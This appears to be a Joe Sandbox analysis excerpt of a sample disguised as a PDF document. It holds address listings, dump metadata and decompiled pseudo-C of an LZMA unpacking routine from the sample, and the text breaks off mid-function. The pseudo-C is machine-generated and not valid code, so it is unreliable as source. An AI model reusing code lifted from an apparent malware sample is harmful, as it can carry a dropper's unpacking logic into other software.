                                                                      0x00406bc9
                                                                      0x00406bc9
                                                                      0x00406bce
                                                                      0x00000000
                                                                      0x00406bce
                                                                      0x00406b7f
                                                                      0x00406b82
                                                                      0x00406b85
                                                                      0x00406b8f
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406be3
                                                                      0x00406be7
                                                                      0x00406c0a
                                                                      0x00406c0d
                                                                      0x00406c10
                                                                      0x00406c1a
                                                                      0x00406be9
                                                                      0x00406be9
                                                                      0x00406bec
                                                                      0x00406bef
                                                                      0x00406bf2
                                                                      0x00406bff
                                                                      0x00406c02
                                                                      0x00406c02
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406c26
                                                                      0x00406c2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c30
                                                                      0x00406c34
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c3a
                                                                      0x00406c3c
                                                                      0x00406c40
                                                                      0x00406c40
                                                                      0x00406c43
                                                                      0x00406c47
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cbe
                                                                      0x00406cc2
                                                                      0x00406cc9
                                                                      0x00406ccc
                                                                      0x00406ccf
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cc4
                                                                      0x00406cd2
                                                                      0x00406cd5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d7e
                                                                      0x00406d7e
                                                                      0x00406d82
                                                                      0x00407120
                                                                      0x00000000
                                                                      0x00407120
                                                                      0x00406d88
                                                                      0x00406d8b
                                                                      0x00406d8e
                                                                      0x00406d92
                                                                      0x00406d95
                                                                      0x00406d9b
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406d9d
                                                                      0x00406da0
                                                                      0x00406da3
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406973
                                                                      0x00406973
                                                                      0x00406977
                                                                      0x004070e4
                                                                      0x00000000
                                                                      0x004070e4
                                                                      0x0040697d
                                                                      0x00406980
                                                                      0x00406983
                                                                      0x00406987
                                                                      0x0040698a
                                                                      0x00406990
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406992
                                                                      0x00406995
                                                                      0x00406998
                                                                      0x00406998
                                                                      0x0040699b
                                                                      0x0040699e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069a4
                                                                      0x004069aa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004069b0
                                                                      0x004069b0
                                                                      0x004069b4
                                                                      0x004069b7
                                                                      0x004069ba
                                                                      0x004069bd
                                                                      0x004069c0
                                                                      0x004069c1
                                                                      0x004069c4
                                                                      0x004069c6
                                                                      0x004069cc
                                                                      0x004069cf
                                                                      0x004069d2
                                                                      0x004069d5
                                                                      0x004069d8
                                                                      0x004069db
                                                                      0x004069de
                                                                      0x004069fa
                                                                      0x004069fd
                                                                      0x00406a00
                                                                      0x00406a03
                                                                      0x00406a0a
                                                                      0x00406a0e
                                                                      0x00406a10
                                                                      0x00406a14
                                                                      0x004069e0
                                                                      0x004069e0
                                                                      0x004069e4
                                                                      0x004069ec
                                                                      0x004069f1
                                                                      0x004069f3
                                                                      0x004069f5
                                                                      0x004069f5
                                                                      0x00406a17
                                                                      0x00406a1e
                                                                      0x00406a21
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a27
                                                                      0x00000000
                                                                      0x00406a2c
                                                                      0x00406a2c
                                                                      0x00406a30
                                                                      0x004070f0
                                                                      0x00000000
                                                                      0x004070f0
                                                                      0x00406a36
                                                                      0x00406a39
                                                                      0x00406a3c
                                                                      0x00406a40
                                                                      0x00406a43
                                                                      0x00406a49
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4b
                                                                      0x00406a4e
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a51
                                                                      0x00406a57
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406a59
                                                                      0x00406a5c
                                                                      0x00406a5f
                                                                      0x00406a62
                                                                      0x00406a65
                                                                      0x00406a68
                                                                      0x00406a6b
                                                                      0x00406a6e
                                                                      0x00406a71
                                                                      0x00406a74
                                                                      0x00406a77
                                                                      0x00406a8f
                                                                      0x00406a92
                                                                      0x00406a95
                                                                      0x00406a98
                                                                      0x00406a9b
                                                                      0x00406a9f
                                                                      0x00406aa1
                                                                      0x00406a79
                                                                      0x00406a79
                                                                      0x00406a81
                                                                      0x00406a86
                                                                      0x00406a88
                                                                      0x00406a8a
                                                                      0x00406a8a
                                                                      0x00406aa4
                                                                      0x00406aab
                                                                      0x00406aae
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00000000
                                                                      0x00406ab0
                                                                      0x00406aae
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00406ab5
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406af0
                                                                      0x00406af0
                                                                      0x00406af4
                                                                      0x004070fc
                                                                      0x00000000
                                                                      0x004070fc
                                                                      0x00406afa
                                                                      0x00406afd
                                                                      0x00406b00
                                                                      0x00406b04
                                                                      0x00406b07
                                                                      0x00406b0d
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b0f
                                                                      0x00406b12
                                                                      0x00406b15
                                                                      0x00406b15
                                                                      0x00406b1b
                                                                      0x00406ab9
                                                                      0x00406ab9
                                                                      0x00406abc
                                                                      0x00000000
                                                                      0x00406abc
                                                                      0x00406b1d
                                                                      0x00406b1d
                                                                      0x00406b20
                                                                      0x00406b23
                                                                      0x00406b26
                                                                      0x00406b29
                                                                      0x00406b2c
                                                                      0x00406b2f
                                                                      0x00406b32
                                                                      0x00406b35
                                                                      0x00406b38
                                                                      0x00406b3b
                                                                      0x00406b53
                                                                      0x00406b56
                                                                      0x00406b59
                                                                      0x00406b5c
                                                                      0x00406b5f
                                                                      0x00406b63
                                                                      0x00406b65
                                                                      0x00406b3d
                                                                      0x00406b3d
                                                                      0x00406b45
                                                                      0x00406b4a
                                                                      0x00406b4c
                                                                      0x00406b4e
                                                                      0x00406b4e
                                                                      0x00406b68
                                                                      0x00406b6f
                                                                      0x00406b72
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406b74
                                                                      0x00000000
                                                                      0x00406e01
                                                                      0x00406e01
                                                                      0x00406e05
                                                                      0x0040712c
                                                                      0x00000000
                                                                      0x0040712c
                                                                      0x00406e0b
                                                                      0x00406e0e
                                                                      0x00406e11
                                                                      0x00406e15
                                                                      0x00406e18
                                                                      0x00406e1e
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e20
                                                                      0x00406e23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406f10
                                                                      0x00406f14
                                                                      0x00406f36
                                                                      0x00406f39
                                                                      0x00406f43
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406f46
                                                                      0x00406f46
                                                                      0x00406f16
                                                                      0x00406f19
                                                                      0x00406f1d
                                                                      0x00406f20
                                                                      0x00406f20
                                                                      0x00406f23
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406fcd
                                                                      0x00406fd1
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406fef
                                                                      0x00406ff6
                                                                      0x00406ffd
                                                                      0x00407004
                                                                      0x00407004
                                                                      0x00000000
                                                                      0x00407004
                                                                      0x00406fd3
                                                                      0x00406fd6
                                                                      0x00406fd9
                                                                      0x00406fdc
                                                                      0x00406fe3
                                                                      0x00406f27
                                                                      0x00406f27
                                                                      0x00406f2a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004070be
                                                                      0x004070c1
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406cf8
                                                                      0x00406cfa
                                                                      0x00406d01
                                                                      0x00406d02
                                                                      0x00406d04
                                                                      0x00406d07
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406d0f
                                                                      0x00406d12
                                                                      0x00406d15
                                                                      0x00406d17
                                                                      0x00406d19
                                                                      0x00406d19
                                                                      0x00406d1a
                                                                      0x00406d1d
                                                                      0x00406d24
                                                                      0x00406d27
                                                                      0x00406d35
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040700b
                                                                      0x0040700b
                                                                      0x0040700e
                                                                      0x00407015
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040701a
                                                                      0x0040701a
                                                                      0x0040701e
                                                                      0x00407156
                                                                      0x00000000
                                                                      0x00407156
                                                                      0x00407024
                                                                      0x00407027
                                                                      0x0040702a
                                                                      0x0040702e
                                                                      0x00407031
                                                                      0x00407037
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x00407039
                                                                      0x0040703c
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x0040703f
                                                                      0x00407042
                                                                      0x00407042
                                                                      0x00407046
                                                                      0x004070a6
                                                                      0x004070a9
                                                                      0x004070ae
                                                                      0x004070af
                                                                      0x004070b1
                                                                      0x004070b3
                                                                      0x004070b6
                                                                      0x00406fc2
                                                                      0x00406fc2
                                                                      0x00000000
                                                                      0x00406fc8
                                                                      0x00406fc2
                                                                      0x00407048
                                                                      0x0040704e
                                                                      0x00407051
                                                                      0x00407054
                                                                      0x00407057
                                                                      0x0040705a
                                                                      0x0040705d
                                                                      0x00407060
                                                                      0x00407063
                                                                      0x00407066
                                                                      0x00407069
                                                                      0x00407082
                                                                      0x00407085
                                                                      0x00407088
                                                                      0x0040708b
                                                                      0x0040708f
                                                                      0x00407091
                                                                      0x00407091
                                                                      0x00407092
                                                                      0x00407095
                                                                      0x0040706b
                                                                      0x0040706b
                                                                      0x00407073
                                                                      0x00407078
                                                                      0x0040707a
                                                                      0x0040707d
                                                                      0x0040707d
                                                                      0x00407098
                                                                      0x0040709f
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x004070a1
                                                                      0x00000000
                                                                      0x00406d3d
                                                                      0x00406d40
                                                                      0x00406d76
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea6
                                                                      0x00406ea9
                                                                      0x00406ea9
                                                                      0x00406eac
                                                                      0x00406eae
                                                                      0x00407138
                                                                      0x00000000
                                                                      0x00407138
                                                                      0x00406eb4
                                                                      0x00406eb7
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ebd
                                                                      0x00406ec1
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00406ec4
                                                                      0x00000000
                                                                      0x00406ec4
                                                                      0x00406d42
                                                                      0x00406d44
                                                                      0x00406d46
                                                                      0x00406d48
                                                                      0x00406d4b
                                                                      0x00406d4c
                                                                      0x00406d4e
                                                                      0x00406d50
                                                                      0x00406d53
                                                                      0x00406d56
                                                                      0x00406d6c
                                                                      0x00406d71
                                                                      0x00406da9
                                                                      0x00406da9
                                                                      0x00406dad
                                                                      0x00406dd9
                                                                      0x00406ddb
                                                                      0x00406de2
                                                                      0x00406de5
                                                                      0x00406de8
                                                                      0x00406de8
                                                                      0x00406ded
                                                                      0x00406ded
                                                                      0x00406def
                                                                      0x00406df2
                                                                      0x00406df9
                                                                      0x00406dfc
                                                                      0x00406e29
                                                                      0x00406e29
                                                                      0x00406e2c
                                                                      0x00406e2f
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00406ea3
                                                                      0x00000000
                                                                      0x00406ea3
                                                                      0x00406e31
                                                                      0x00406e37
                                                                      0x00406e3a
                                                                      0x00406e3d
                                                                      0x00406e40
                                                                      0x00406e43
                                                                      0x00406e46
                                                                      0x00406e49
                                                                      0x00406e4c
                                                                      0x00406e4f
                                                                      0x00406e52
                                                                      0x00406e6b
                                                                      0x00406e6d
                                                                      0x00406e70
                                                                      0x00406e71
                                                                      0x00406e74
                                                                      0x00406e76
                                                                      0x00406e79
                                                                      0x00406e7b
                                                                      0x00406e7d
                                                                      0x00406e80
                                                                      0x00406e82
                                                                      0x00406e85
                                                                      0x00406e89
                                                                      0x00406e8b
                                                                      0x00406e8b
                                                                      0x00406e8c
                                                                      0x00406e8f
                                                                      0x00406e92
                                                                      0x00406e54
                                                                      0x00406e54
                                                                      0x00406e5c
                                                                      0x00406e61
                                                                      0x00406e63
                                                                      0x00406e66
                                                                      0x00406e66
                                                                      0x00406e95
                                                                      0x00406e9c
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00406e26
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00000000
                                                                      0x00406e9e
                                                                      0x00406e9c
                                                                      0x00406daf
                                                                      0x00406db2
                                                                      0x00406db4
                                                                      0x00406db7
                                                                      0x00406dba
                                                                      0x00406dbd
                                                                      0x00406dbf
                                                                      0x00406dc2
                                                                      0x00406dc5
                                                                      0x00406dc5
                                                                      0x00406dc8
                                                                      0x00406dc8
                                                                      0x00406dcb
                                                                      0x00406dd2
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00406da6
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00000000
                                                                      0x00406dd4
                                                                      0x00406dd2
                                                                      0x00406d58
                                                                      0x00406d5b
                                                                      0x00406d5d
                                                                      0x00406d60
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406abf
                                                                      0x00406abf
                                                                      0x00406ac3
                                                                      0x00407108
                                                                      0x00000000
                                                                      0x00407108
                                                                      0x00406ac9
                                                                      0x00406acc
                                                                      0x00406acf
                                                                      0x00406ad2
                                                                      0x00406ad5
                                                                      0x00406ad8
                                                                      0x00406adb
                                                                      0x00406add
                                                                      0x00406ae0
                                                                      0x00406ae3
                                                                      0x00406ae6
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00406ae8
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406c4a
                                                                      0x00406c4a
                                                                      0x00406c4e
                                                                      0x00407114
                                                                      0x00000000
                                                                      0x00407114
                                                                      0x00406c54
                                                                      0x00406c57
                                                                      0x00406c5a
                                                                      0x00406c5d
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c5f
                                                                      0x00406c62
                                                                      0x00406c65
                                                                      0x00406c68
                                                                      0x00406c6b
                                                                      0x00406c6e
                                                                      0x00406c71
                                                                      0x00406c72
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c74
                                                                      0x00406c77
                                                                      0x00406c7a
                                                                      0x00406c7d
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c80
                                                                      0x00406c83
                                                                      0x00406c85
                                                                      0x00406c85
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ec7
                                                                      0x00406ecb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00406ed1
                                                                      0x00406ed4
                                                                      0x00406ed7
                                                                      0x00406eda
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edc
                                                                      0x00406edf
                                                                      0x00406ee2
                                                                      0x00406ee5
                                                                      0x00406ee8
                                                                      0x00406eeb
                                                                      0x00406eee
                                                                      0x00406eef
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef1
                                                                      0x00406ef4
                                                                      0x00406ef7
                                                                      0x00406efa
                                                                      0x00406efd
                                                                      0x00406f00
                                                                      0x00406f04
                                                                      0x00406f06
                                                                      0x00406f09
                                                                      0x00000000
                                                                      0x00406f0b
                                                                      0x00406c88
                                                                      0x00406c88
                                                                      0x00000000
                                                                      0x00406c88
                                                                      0x00406f09
                                                                      0x0040713e
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0040676d
                                                                      0x00407175
                                                                      0x00407175
                                                                      0x00000000
                                                                      0x00407175
                                                                      0x00406fc2
                                                                      0x00406f49
                                                                      0x00406f46
                                                                      0x00000000
                                                                      0x00406c9b

                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.167508240401.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 00000002.00000002.167508184127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508327237.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508358463.0000000000464000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000002.00000002.167508702241.0000000000468000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_400000_DPR602859651100125001V1100125154830E 3-2-2023#U00b7pdf.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                                      • Instruction ID: 9997fd61ac043c1521ccfeb60d91edfb3447ef4cf3d9eb85cab0c4916a58cc02
                                                                      • Opcode Fuzzy Hash: dcb8aa4ffb3c1ace06284f4ef2cf8db0442e32867474e3534aac7ea6feec76b4
                                                                      • Instruction Fuzzy Hash: 5E714331D04229DBDF28CFA8C844BADBBB1FF44305F15806AD846BB290C7785996DF45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00406BE3 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 98%
                                                                      			E00406BE3() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xa;
						_t606 =  *(_t613 - 4) + 0x1b0 +  *(_t613 - 0x38) * 2;
					} else {
						 *(__ebp - 0x84) = 9;
						 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
					}
					while(1) {
						 *(_t613 - 0x54) = _t606;
						while(1) {
							L133:
							_t531 =  *_t606;
							_t589 = _t531 & 0x0000ffff;
							_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
							if( *(_t613 - 0xc) >= _t565) {
								 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
								 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
								 *(_t613 - 0x40) = 1;
								_t532 = _t531 - (_t531 >> 5);
								 *_t606 = _t532;
							} else {
								 *(_t613 - 0x10) = _t565;
								 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
								 *_t606 = (0x800 - _t589 >> 5) + _t531;
							}
							if( *(_t613 - 0x10) >= 0x1000000) {
								goto L139;
							}
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								L170:
								_t568 = 0x22;
								memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
								_t535 = 0;
								L172:
								return _t535;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L139:
							_t533 =  *(_t613 - 0x84);
							while(1) {
								 *(_t613 - 0x88) = _t533;
								while(1) {
									L1:
									_t534 =  *(_t613 - 0x88);
									if(_t534 > 0x1c) {
										break;
									}
									switch( *((intOrPtr*)(_t534 * 4 +  &M0040717D))) {
										case 0:
											if( *(_t613 - 0x6c) == 0) {
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t534 =  *( *(_t613 - 0x70));
											if(_t534 > 0xe1) {
												goto L171;
											}
											_t538 = _t534 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t570);
											_push(9);
											_pop(_t571);
											_t609 = _t538 / _t570;
											_t540 = _t538 % _t570 & 0x000000ff;
											asm("cdq");
											_t604 = _t540 % _t571 & 0x000000ff;
											 *(_t613 - 0x3c) = _t604;
											 *(_t613 - 0x1c) = (1 << _t609) - 1;
											 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
											_t612 = (0x300 << _t604 + _t609) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
												L10:
												if(_t612 == 0) {
													L12:
													 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t612 = _t612 - 1;
													 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
												} while (_t612 != 0);
												goto L12;
											}
											if( *(_t613 - 4) != 0) {
												GlobalFree( *(_t613 - 4));
											}
											_t534 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t613 - 4) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 1;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
											_t45 = _t613 - 0x48;
											 *_t45 =  *(_t613 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t613 - 0x48) < 4) {
												goto L13;
											}
											_t546 =  *(_t613 - 0x40);
											if(_t546 ==  *(_t613 - 0x74)) {
												L20:
												 *(_t613 - 0x48) = 5;
												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											 *(_t613 - 0x74) = _t546;
											if( *(_t613 - 8) != 0) {
												GlobalFree( *(_t613 - 8));
											}
											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
											 *(_t613 - 8) = _t534;
											if(_t534 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
											 *(_t613 - 0x84) = 6;
											 *(_t613 - 0x4c) = _t553;
											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
											 *(_t613 - 0x54) = _t606;
											goto L133;
										case 3:
											L21:
											__eflags =  *(_t613 - 0x6c);
											if( *(_t613 - 0x6c) == 0) {
												 *(_t613 - 0x88) = 3;
												goto L170;
											}
											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
											_t67 = _t613 - 0x70;
											 *_t67 =  &(( *(_t613 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
											L23:
											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
											if( *(_t613 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t531 =  *_t606;
											_t589 = _t531 & 0x0000ffff;
											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
											if( *(_t613 - 0xc) >= _t565) {
												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
												 *(_t613 - 0x40) = 1;
												_t532 = _t531 - (_t531 >> 5);
												 *_t606 = _t532;
											} else {
												 *(_t613 - 0x10) = _t565;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
												 *_t606 = (0x800 - _t589 >> 5) + _t531;
											}
											if( *(_t613 - 0x10) >= 0x1000000) {
												goto L139;
											}
										case 5:
											goto L137;
										case 6:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 8:
											goto L0;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L89;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
